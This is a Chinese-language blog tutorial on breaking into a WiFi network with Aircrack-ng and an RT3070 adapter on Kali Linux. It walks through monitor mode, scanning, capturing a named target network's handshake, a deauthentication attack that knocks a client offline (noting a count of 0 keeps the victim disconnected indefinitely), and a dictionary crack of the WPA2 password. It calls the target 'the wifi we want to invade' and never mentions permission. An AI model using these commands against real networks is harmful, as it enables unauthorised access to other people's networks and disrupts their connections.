使用Aircrack-ng和RT3070无线网卡破解WIFI密码

文章目录

  • 设备
    • kali-linux
    • 无线网卡
  • 入侵wifi
    • 无线网卡连接kali
    • 发现wifi
    • 监听目标wifi的握手包
    • 破解握手包
    • 连接wifi

设备

kali-linux

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。
Kali自带Aircrack-ng,无需再次安装。

无线网卡

使用RT3070系列或者其他系列的无线外置网卡。
购买时注意支持kali免装驱动

入侵wifi

无线网卡连接kali

打开kali虚拟机,插入无线网卡,选择连接到虚拟机。
使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第1张图片
查看网卡设备:

ifconfig

使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第2张图片发现比之前多了一个wlan0网卡。

查看是否支持监听:

airmon-ng

在这里插入图片描述

发现wifi

开启无线网卡监控模式:

airmon-ng start wlan0

使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第3张图片
查看周围WIFI网络:

airodump-ng wlan0mon

使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第4张图片
红框中为我们要入侵的wifi。

监听目标wifi的握手包

监听目标网络的握手包:

airodump-ng -c 11 --bssid 60:3A:7C:6F:E1:FA -w ~/1/ wlan0mon

参数解释:
-c指定频道号
-bssid指定路由器bssid
-w指定抓取的数据包保存位置
使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第5张图片
强制对方WIFI断开重连(获取握手包):
新开终端,输入

aireplay-ng -0 2 -a 60:3A:7C:6F:E1:FA -c 32:FE:81:BC:54:8E wlan0mon

参数解释:
-0表示发起(鉴权)
2表示重新连接两次,2改成0,那对方就不停地输密码,也连不上
deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第6张图片

破解握手包

破解握手包密码:

aircrack-ng -a2 -b 60:3A:7C:6F:E1:FA -w wifipass.txt ~/1/*.cap

参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID
-w指定字典文件
最后是抓取的包

选择握手包的加密方式:
-a1:指定WEP加密方式
-a2:指定WPA-PSK加密方式
使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第7张图片破解成功。

连接wifi

关闭监听模式:

airmon-ng stop wlan0mon

之后就可以连接wifi了
使用Aircrack-ng和RT3070无线网卡破解WIFI密码_第8张图片
连接wifi后,输入ifconfig,就会发现wlan0网卡有了ip地址。

在这里插入图片描述

你可能感兴趣的:(使用Aircrack-ng和RT3070无线网卡破解WIFI密码)